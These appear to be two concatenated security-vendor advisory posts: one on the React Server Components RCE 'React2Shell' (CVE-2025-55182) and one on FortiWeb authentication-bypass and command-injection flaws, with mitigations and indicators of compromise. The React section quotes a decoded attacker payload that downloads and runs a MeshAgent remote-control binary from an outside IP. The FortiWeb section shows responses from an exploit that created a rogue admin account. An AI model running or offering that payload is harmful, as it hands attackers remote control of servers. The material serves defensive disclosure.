Overview

Update #1: As of 4:30 PM Eastern, December 4, 2025, Rapid7 has validated that a working weaponized proof-of-concept exploit, shared by researcher @maple3142, is now publicly available.

Update #2: On December 5, 2025, Lachlan Davidson who discovered the vulnerability has also published a proof-of-concept. A Metasploit exploit module is also available.

Update #3: At 10:00 AM Eastern, December 5, 2025, CVE-2025-55182 was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), confirming exploitation in-the-wild has begun.

On December 3, 2025, Meta disclosed a new vulnerability, CVE-2025-55182, which has since been dubbed React2Shell. A second CVE identifier, CVE-2025-66478, was assigned and published to track the vulnerability in the context of Next.js. However this second CVE has since been rejected as a duplicate of CVE-2025-55182, as the root cause in all cases is the same and should be referred to with a single common CVE identifier.

CVE-2025-55182 is a critical unauthenticated remote code execution vulnerability affecting React, a very popular library for building modern web applications. This new vulnerability has a CVSS rating of 10.0, which is the maximum rating possible and indicates the highly critical nature of the issue. Successful exploitation of CVE-2025-55182 allows a remote unauthenticated attacker to execute arbitrary code on an affected server via malicious HTTP requests.

The vulnerability affects React applications that support React Server Components. While the vulnerability affects the React Server Components feature, server applications may still be vulnerable even if the application does not explicitly implement any React Server Function endpoints but does support React Server Components. Additionally, many popular frameworks based on React, such as Next.js, are also affected by this vulnerability.

A separate advisory was published by Vercel, the vendor for Next.js. This advisory tracks the impact of CVE-2025-55182 as it applies to the Next.js framework, and provides information for Next.js users to remediate the issue. 

As of this blog’s publication on December 4, 2025, there is no known public exploit code available. Several exploits have been published claiming to exploit CVE-2025-55182; however, they have not been successfully verified as actually exploiting this vulnerability. This has been noted in the original finder’s website, react2shell.com. Although broad exploitation has not yet begun, we expect this to quickly change once a viable public exploit becomes available.

Organizations who use React or the affected downstream frameworks are urged to remediate this vulnerability on an urgent basis, outside of normal patch cycles and before broad exploitation begins.

Mitigation guidance

CVE-2025-55182 affects versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of the following React packages:

• react-server-dom-webpack

• react-server-dom-parcel

• react-server-dom-turbopack

A vendor-supplied update for the above packages is available in versions 19.0.1, 19.1.2, and 19.2.1. Users of affected React packages are advised to update to the latest remediated version on an urgent basis.

Downstream frameworks that depend on React are also affected, this includes (but is not limited to):

• Next.js

• React Router

• Waku

• Parcel

• Vite

• RedwoodSDK

For the latest mitigation guidance for React, please refer to the React security advisory. For the latest mitigation guidance specific to Next.js, please refer to the Vercel security advisory.

Rapid7 customers

Exposure Command, InsightVM and Nexpose

An unauthenticated check for CVE-2025-55182 has been available to Exposure Command, InsightVM and Nexpose customers since the December 4th content release. Note that the first iteration of the check was a "potential" type check which was later revised to a non-potential (normal remote check) one on Friday, the 5th December.

Intelligence Hub

Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-55182, including indicators of compromise (IOCs), Yara and Sigma rules.

Observed exploitation

As of December 8, 2025, Rapid7 honeypots have observed exploitation attempts of CVE-2025-55182 using the same RCE technique from the PoC published on December 4, 2025. While the exploit attempts seen on our honeypots match the RCE technique from that original PoC, the actual payloads being delivered (i.e. what the attackers are trying to execute on a compromised server), are now different and show malicious intent.

One such example we are seeing is the deployment of MeshAgent remote control software, which if successful will allow an attacker to remotely control newly compromised systems from a centralized location. The decoded malicious payload command can be seen here:

[ "$EUID" -eq 0 ] && URL="https://156.67.221.96/meshagents?id=hrfDDhB%40yNf4oBrCH%40R%24KfVp27XfA78LiX%40IZUxoTgs3zCwG%24bjdpR%400oa8%40BhTf&installflags=0&meshinstall=6" || URL="https://156.67.221.96/meshagents?id=yGNhrz51DRyitgqtVyaSjJU3GsIKSJpCfD5aQ%24QPcbjBXNVeFkiZg1LAmWYOQyP4&installflags=0&meshinstall=6"; wget -O /tmp/meshagent --no-check-certificate "$URL" && chmod +x /tmp/meshagent && cd /tmp/ && ([ "$EUID" -eq 0 ] && ./meshagent -install || ./meshagent -connect)

The behavior of this payload is shown below.

Indicators of compromise (IOCs)

IP Addresses

• 156.67.221[.]96

Updates

• December 4, 2025: Several minor edits for punctuation and grammar.
• December 4, 2025: Coverage availability for Rapid 7 customers.
• December 4, 2025: PoC validation updated.
• December 5, 2025: The original finder has also published their PoC. A Metasploit exploit is available.
• December 5, 2025: Added reference to CISA KEV.
• December 8, 2025: Updated coverage information.
• December 8, 2025: Added Intelligence Hub coverage to the Rapid7 customers section. Added an Observed exploitation section.

Overview

On October 6, 2025, the cyber deception company Defused published a proof-of-concept exploit on social media that was captured by one of their Fortinet FortiWeb Manager honeypots. FortiWeb is a Web Application Firewall (WAF) product that is designed to detect and block malicious traffic to web applications. Exploitation of this new vulnerability, now tracked as CVE-2025-64446, allows an attacker with no existing level of access to gain administrator-level access to the FortiWeb Manager panel and websocket command-line interface. Rapid7 has tested the latest FortiWeb version 8.0.2 and observed that the existing public proof-of-concept exploit does not work. However, the exploit does work against earlier versions, including version 8.0.1, which was released in August, 2025. 

Based on the information circulated by Defused, this new vulnerability is claimed to have been exploited in the wild in October, 2025. On November 14, 2025, Fortinet PSIRT published CVE-2025-64446 and an official advisory for the critical vulnerability, which holds a CVSS score of 9.1. Organizations running versions of Fortinet FortiWeb that are listed as affected in the advisory are advised to remediate this vulnerability on an emergency basis, given that exploitation has been occurring since October in targeted attacks, and broad exploitation will likely occur in the coming days. A Metasploit module for CVE-2025-64446 is available here, and security firm watchTowr has published a technical analysis. CISA's KEV catalog has been updated to include CVE-2025-64446.

It’s unclear whether the FortiWeb release cycle intentionally included a silent patch for this vulnerability or merely coincidentally included changes that broke the existing exploit.

On November 18, 2025, Fortinet published a new advisory for CVE-2025-58034. This new vulnerability is an authenticated command injection affecting FortiWeb. Fortinet has indicated CVE-2025-58034 has also been exploited in-the-wild, and CISA's KEV catalog has been updated to include this new vulnerability. It is not clear at this time if both CVE-2025-64446 and CVE-2025-58034 have been exploited in-the-wild together as an exploit chain.

This blog post will be updated as new developments arise.

Rapid7 observations

On November 6, 2025, Rapid7 Labs observed that an alleged zero-day exploit targeting FortiWeb was published for sale on a popular black hat forum. While it is not clear at this time if this is the same exploit as the one described above, the timing is coincidental.

⠀

Mitigation guidance

On November 14, 2025, Fortinet published an advisory that outlines remediation steps and workaround mitigations for CVE-2025-64446. According to Fortinet, the following versions are affected, and the fixed versions for each main release branch are also listed:

• Versions 8.0.0 through 8.0.1 are vulnerable, 8.0.2 and above are fixed.
• Versions 7.6.0 through 7.6.4 are vulnerable, 7.6.5 and above are fixed.
• Versions 7.4.0 through 7.4.9 are vulnerable, 7.4.10 and above are fixed.
• Versions 7.2.0 through 7.2.11 are vulnerable, 7.2.12 and above are fixed.
• Versions 7.0.0 through 7.0.11 are vulnerable, 7.0.12 and above are fixed.
  

In cases where immediate upgrades are not possible, the advisory states the following: “Disable HTTP or HTTPS for internet facing interfaces. Fortinet recommends taking this action until an upgrade can be performed. If the HTTP/HTTPS Management interface is internally accessible only as per best practice, the risk is significantly reduced.”

Rapid7 Labs has confirmed that older unsupported versions of FortiWeb 6.x are also vulnerable to both CVE-2025-64446 and CVE-2025-58034. Customers using unsupported versions of FortiWeb should update to a supported version, as described above.

Exploitation behavior

When testing the public exploit against a target FortiWeb device, the target application’s differing responses between versions 8.0.1 and 8.0.2 are included below.

Against version 8.0.1, the application returns the following response for a successful exploitation attempt, in which a new malicious local administrator account “hax0r” was created:

HTTP/1.1 200 OK
Date: Thu, 13 Nov 2025 17:57:28 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self'; upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json
Content-Length: 1202

{ "results": { "can_view": 0, "q_ref": 0, "can_clone": 1, "q_type": 1, "name": "hax0r", "access-profile": "prof_admin", "access-profile_val": "1008", "trusthostv4": "0.0.0.0\/0 ", "trusthostv6": "::\/0 ", "last-name": "", "first-name": "", "email-address": "", "phone-number": "", "mobile-number": "", "hidden": 0, "domains": "root ", "gui-global-menu-favorites": "", "gui-vdom-menu-favorites": "", "sz_dashboard": 8, "sz_gui-dashboard": 7, "type": "local-user", "type_val": "0", "admin-usergrp": "", "admin-usergrp_val": "0", "password": "ENC XXXX", "wildcard": "disable", "wildcard_val": "0", "accprofile-override": "disable", "accprofile-override_val": "0", "fortiai": "disable", "fortiai_val": "0", "sshkey": "", "passwd-set-time": 1763056648, "history-password-pos": 1, "history-password0": "ENC XXXX", "history-password1": "ENC XXXX", "history-password2": "ENC XXXX", "history-password3": "ENC XXXX", "history-password4": "ENC XXXX", "history-password5": "ENC XXXX", "history-password6": "ENC XXXX", "history-password7": "ENC XXXX", "history-password8": "ENC XXXX", "history-password9": "ENC XXXX", "force-password-change": "disable", "force-password-change_val": "0", "feature-info-ver": "" } }

⠀

However, against version 8.0.2, the application returns the following “403 Forbidden” response for an unsuccessful exploitation attempt:

⠀

HTTP/1.1 403 Forbidden
Date: Thu, 13 Nov 2025 17:28:42 GMT
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: script-src 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; font-src 'self'; img-src 'self' data:; connect-src 'self'; frame-ancestors 'self'; object-src 'none'; base-uri 'self'; upgrade-insecure-requests; block-all-mixed-content;
X-Content-Type-Options: nosniff
Content-Length: 199
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
</body></html>

Rapid7 customers

Exposure Command, InsightVM and Nexpose

Exposure Command, InsightVM and Nexpose customers can assess their exposure to both vulnerabilities described in this blog post as follows:

• CVE-2025-64446: an unauthenticated vulnerability check is available in the November 14 content release. Please note that the “SAFE” check mode needs to be disabled while running scans to ensure the check for CVE-2025-64446 runs successfully.
• CVE-2025-58034: an authenticated vulnerability check is available in the November 26 content release. There is no need to disable the “SAFE” check mode, since the CVE-2025-58034 check will run by default.

Intelligence Hub

Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-64446, including a Sigma rule and IOCs of IP addresses attempting to exploit this vulnerability.

Updates

• November 14, 2025: The blog post has been updated to reflect the newly-published official advisory and CVE identifier, the availability of vulnerability checks and a Metasploit module for customer testing, the CISA KEV addition, and a published technical analysis.

• November 17, 2025: The Rapid7 customers section has been updated to add Intelligence Hub coverage, and clarify that vulnerability checks were shipped on Nov 14, 2025.

• November 19, 2025: The Overview section has been updated to reference the newly published vulnerability, CVE-2025-58034. The Rapid7 customers section has been updated to add expected coverage availability for CVE-2025-58034.

• November 19, 2025: The Rapid7 customers section has been updated with CVE-2025-58034 coverage information for supported FortiWeb release branches.

• December 1, 2025: The Mitigation guidance section has been updated with confirmation that older unsupported versions of FortiWeb 6.x are also vulnerable to both CVE-2025-64446 and CVE-2025-58034.